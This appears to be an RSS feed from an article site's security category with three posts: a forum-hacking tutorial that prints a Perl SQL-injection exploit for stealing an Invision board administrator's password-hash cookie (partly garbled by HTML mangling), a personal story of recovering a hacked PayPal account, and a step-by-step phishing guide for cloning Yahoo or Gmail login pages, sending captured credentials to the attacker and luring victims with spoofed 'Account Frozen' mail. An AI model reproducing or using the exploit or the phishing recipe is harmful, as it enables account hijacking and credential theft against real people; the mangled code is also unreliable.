<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>All Amazing Articles &#187; Security</title>
	<atom:link href="http://www.allticles.com/category/internet/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.allticles.com</link>
	<description>Allticles.com. An ever growing website consists of top quality article colections such as Computer, Technology, Science, Finance, Entertainments, etc.</description>
	<lastBuildDate>Sun, 25 Oct 2009 00:09:18 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>How to Hack into forums</title>
		<link>http://www.allticles.com/how-to-hack-into-forums/</link>
		<comments>http://www.allticles.com/how-to-hack-into-forums/#comments</comments>
		<pubDate>Sat, 06 Dec 2008 23:40:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Hacking Forum]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>

		<guid isPermaLink="false">http://www.allticles.com/?p=715</guid>
		<description><![CDATA[This is what you like to call “Hacking a forum”.
I call it “Cracking into a forum” … Learn what hacking means you, lol…
PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :
First of all, what you need is a forum to hack. For the sake of this [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">This is what you like to call “Hacking a forum”.</p>
<p style="text-align: justify;">I call it “Cracking into a forum” … Learn what hacking means you, lol…</p>
<p style="text-align: justify;"><strong>PS:</strong> I am hacking a forum slowly, everything i am doing now, is posted here by steps :</p>
<p style="text-align: justify;">First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as “hackingsite”.</p>
<p style="text-align: justify;">So you’ve got your target. You know the forum to want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1″. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2″.</p>
<p style="text-align: justify;">Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2″.</p>
<p style="text-align: justify;">Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:</p>
<p style="text-align: justify;"><span id="more-715"></span></p>
<p style="text-align: justify;">CODE<br />
#!/usr/bin/perl -w<br />
##################################################################<br />
# This one actually works <img src='http://www.allticles.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  Just paste the outputted cookie into<br />
# your request header using livehttpheaders or something and you<br />
# will probably be logged in as that user. No need to decrypt it!<br />
# Exploit coded by “ReMuSOMeGa &amp; Nova” and http://remusomega.com<br />
##################################################################</p>
<p style="text-align: justify;">use LWP::UserAgent;</p>
<p style="text-align: justify;">$ua = new LWP::UserAgent;<br />
$ua-&gt;agent(”Mosiac 1.0″ . $ua-&gt;agent);</p>
<p style="text-align: justify;">if (!$ARGV[0]) {$ARGV[0] = ”;}<br />
if (!$ARGV[3]) {$ARGV[3] = ”;}</p>
<p style="text-align: justify;">my $path = $ARGV[0] . ‘/index.php?act=Login&amp;CODE=autologin’;<br />
my $user = $ARGV[1]; # userid to jack<br />
my $iver = $ARGV[2]; # version 1 or 2<br />
my $cpre = $ARGV[3]; # cookie prefix<br />
my $dbug = $ARGV[4]; # debug?</p>
<p style="text-align: justify;">if (!$ARGV[2])<br />
{<br />
print “..By ReMuSoMeGa &amp; Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n”;<br />
exit;<br />
}</p>
<p style="text-align: justify;">my @charset = (”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);</p>
<p style="text-align: justify;">my $outputs = ”;</p>
<p style="text-align: justify;">for( $i=1; $i &lt; j=”0;” current =” $charset[$j];” sql =” (” cookie =” (’Cookie’”&gt; $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);<br />
my $res = $ua-&gt;get($path, @cookie);</p>
<p style="text-align: justify;"># If we get a valid sql request then this<br />
# does not appear anywhere in the sources<br />
$pattern = ”;</p>
<p style="text-align: justify;">$_ = $res-&gt;content;</p>
<p style="text-align: justify;">if ($dbug) { print };</p>
<p style="text-align: justify;">if ( !(/$pattern/) )<br />
{<br />
$outputs .= $current;<br />
print “$current\n”;<br />
last;<br />
}</p>
<p style="text-align: justify;">}<br />
if ( length($outputs) &lt; member_id=” . $user . ” pass_hash=”&#8221;&gt;</p>
<p style="text-align: justify;">What the fuck,Pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script.</p>
<p><em>Source: http://www.hungry-hackers.com/</em></p>
]]></content:encoded>
			<wfw:commentRss>http://www.allticles.com/how-to-hack-into-forums/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PayPal Hack &#8211; My PayPal Got Hacked And How I Got it Back</title>
		<link>http://www.allticles.com/paypal-hack-my-paypal-got-hacked-and-how-i-got-it-back/</link>
		<comments>http://www.allticles.com/paypal-hack-my-paypal-got-hacked-and-how-i-got-it-back/#comments</comments>
		<pubDate>Sat, 06 Dec 2008 23:31:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[PayPal]]></category>

		<guid isPermaLink="false">http://www.allticles.com/?p=711</guid>
		<description><![CDATA[This is a story about how my PayPal account got hacked and how I got it back. I had an unlucky day but with a little tinge of lady luck&#8217;s blessings which helped me to get back to square one. This story gives a good advice for all the PayPal account holders on earth.
Day 1 [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">This is a story about how my PayPal account got hacked and how I got it back. I had an unlucky day but with a little tinge of lady luck&#8217;s blessings which helped me to get back to square one. This story gives a good advice for all the PayPal account holders on earth.</p>
<p style="text-align: justify;">Day 1 &#8211; 8.30 PM IST</p>
<p style="text-align: justify;">I just logged in into my gmail account to check the emails, I was shocked to see 4 emails from PayPal. 1. Password Changed, 2. Payment sent to some email address 3. Bank accounts removed 4. Primary email address changed. Oh my God!, I had $X,XXX in PayPal balance. While I was seeing these emails my gmail also got logged out. When I tried to login again, it did not. The hacker watched my every move. My primary email ID was the one which I used for all my business and personal contacts and it had 14000 archived emails and chat conversations.</p>
<p style="text-align: justify;">I was feeling like blindfolded and left in a unknown forest. I just could not believe that this had happened to me. I had Norton anti virus + norton internet security and Spyware doctor, both of them licensed versions!! I know all about fake emails and phishing stuffs, I never clicked on suspicious links.</p>
<p style="text-align: justify;">I realized that&#8230;  &#8220;You are safe only if no one targets to attack you.&#8221;</p>
<p style="text-align: justify;"><span id="more-711"></span></p>
<p style="text-align: justify;">After a few minutes, someone added me to Yahoo messenger and said &#8216;Hi&#8217;. I guessed that it was the hacker and it was. The very first sentence he told me was &#8216;Hi, don&#8217;t worry, you will get back everything within 7 days&#8217; .. He told me that he was a good guy and this is the first time he hacked someone. He also told me that he was in real need of the funds and would return my funds within 7 days. I almost believed him. I told him to give back my gmail account and told him that it was very important to me, and to my surprise he gave it back. He asked me what password I needed for the new account and he set it. I logged in and changed the password again. I was happy that I got back my gmail but was still very uncomfortable about the feeling that someone had watched me for so long!!</p>
<p style="text-align: justify;">I was late in the night, I was sleepy but I had to hold on. I backed up all my files in my iPod and did a system recovery. After 45 minutes, my PC was as good as new. I again changed all the passwords and got back to sleep at midnight.</p>
<p style="text-align: justify;">Day 2 &#8211; 6.00 AM IST</p>
<p style="text-align: justify;">I saw my friend was online. I chatted with him and told him the entire story. He scolded me that I have not responded in timely fashion. He was so sure that the hacker was no good and chatted with me to make sure I don&#8217;t call PayPal. The hacker did not achieve that but however he delayed me by 10 hours. I spent nearly 30 minutes waiting for PayPal representative and then some one showed up. I told PayPal, the entire story and they listened carefully. They assured me that &#8216;I will not be held responsible for unauthorized payments sent from my account&#8217;. I felt good but not very good, I was not so sure that I would get back the money. I did what I could have done and I needed to relax. I took rest from this issue.</p>
<p style="text-align: justify;">Day 3 &#8211; 7 PM EST</p>
<p style="text-align: justify;">I called PayPal again. It needs a ton of patience to get connected with them. It took a few minutes to spot my account. They told me that &#8220;Your fraudulent payments were reversed, did you check your account&#8221;. I just jumped right there and was so happy. But I COULD NOT LOGIN into my PayPal because the password was not with me! <img src='http://www.allticles.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p style="text-align: justify;">I was not able to reset my password because the hacker also changed the security questions! They advised me to send all the documents and they will help to recover the password.</p>
<p style="text-align: justify;">After a few minutes the hacker came online again. And LOL what nerves he got!!.. He asked me to send the documents to him because he said my account got limited and needs to be unlocked!! I refrained myself from talking abusive words and just managed the situation and logged out.</p>
<p style="text-align: justify;">Day 4 &#8211; 6 PM EST</p>
<p style="text-align: justify;">I logged in into yahoo messenger and I saw that the hacker had left me an offline message. Wow! he got frustrated I guess. He left me the PayPal email and password. I logged in and viola! I went inside my PP. Lovely moment it was.. The balance was intact. The four fraudulent payments were reversed. The account was limited though. I just printed the fax cover sheet and sent them the docs.</p>
<p style="text-align: justify;">Day 4 &#8211; 3 PM IST</p>
<p style="text-align: justify;">I got an email that my PayPal account has been restored. I immediately went in and sent 4 big payments to my friends and family members. I could breathe now again!</p>
<p style="text-align: justify;">Now whats next?.. everything is back to square one! Now that I have learnt a good lesson. If we think something like &#8220;This can never happen to me&#8221; you actually attract that situation and within a few days you realize it&#8230; the dream comes true.. even though its a bad dream in this case.</p>
<p style="text-align: justify;">I contacted me friends and everyone told me that I need to kick out Norton and Spyware Doctor and buy Kaspersky because thats what is best in the market. I went to that site and reviewed their products. They had anti virus and Internet Security 7.0. The anti virus comes inbuilt within Internet Security and hence its enough to buy the latter one. For one year it costs around $60 and for 2 years its around $95. I just bought it right away and installed it, activated it. Again I changed all my important passwords.</p>
<p style="text-align: justify;">Bottom line: If you think it wont happen to you, one day it will happen, and you will think about the day when you thought that it won&#8217;t happen to you.</p>
<p style="text-align: justify;">Now that I got my money back, but it may not happen all the time to all the people. You just need to be on top of it.</p>
<p style="text-align: justify;">Good Luck!</p>
<p><em>By Karthik Arun<br />
http://ezinearticles.com/</em></p>
]]></content:encoded>
			<wfw:commentRss>http://www.allticles.com/paypal-hack-my-paypal-got-hacked-and-how-i-got-it-back/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to Hack Gmail or Yahoo or Hotmail or Any Other</title>
		<link>http://www.allticles.com/how-to-hack-gmail-or-yahoo-or-hotmail-or-any-other/</link>
		<comments>http://www.allticles.com/how-to-hack-gmail-or-yahoo-or-hotmail-or-any-other/#comments</comments>
		<pubDate>Sat, 06 Dec 2008 23:29:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Email Hacking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>

		<guid isPermaLink="false">http://www.allticles.com/?p=705</guid>
		<description><![CDATA[First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is [...]]]></description>
			<content:encoded><![CDATA[<div style="text-align: justify;">First of all you need to create an account in a <a style="color: #3333ff; font-family: verdana;" href="http://www.webformdesigner.net/wfd_signup_form.php" target="_blank">form handling service</a>. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.</div>
<p style="text-align: justify;"><strong>Now follow the following steps :</strong></p>
<ol style="font-family: verdana; text-align: justify;">
<li>Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com</li>
<li>Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.</li>
<li>Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML</li>
<p><span id="more-705"></span></p>
<li>Now open the the file yahoofake.html using noepad, here you ll find a code which starts with &lt;form method=”post” action=”https://login.yahoo.com/config/login?” autocomplete=”off” name=”login_form”&gt; ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))</li>
<li>Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)<br />
<form>put the following code after placing your form id:</form>
</li>
</ol>
<div style="text-align: justify;">
<div style="text-align: left;">&lt;form name=”New_Form” action=”http://www.webformdesigner.net/wfd_f2.php?id=Your Form ID Here” method=”post” enctype=”application/x-www-form-urlencoded” onsubmit=”return New_Form_CF();”&gt;</div>
<p>Now Save the yahoofake.html.</p>
<p>To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.</p>
<p>First of all upload your page using some free webhosting services. Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”.</p>
<p>Now select your site name as mail.yahoo.com/support. You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.</p>
<p>Now send a <a style="font-family: verdana; color: #3333ff;" href="http://www.allticles.com/learn-how-to-send-your-fake-email/" target="_blank">fake mail</a> from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.</p>
<p>After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked.</p>
<p>If you have your own ideas plz write it as comment to this post. Your participation is always appreciated.  Good Luck !</p></div>
<p><em>Source: http://www.hungry-hackers.com/</em></p>
]]></content:encoded>
			<wfw:commentRss>http://www.allticles.com/how-to-hack-gmail-or-yahoo-or-hotmail-or-any-other/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

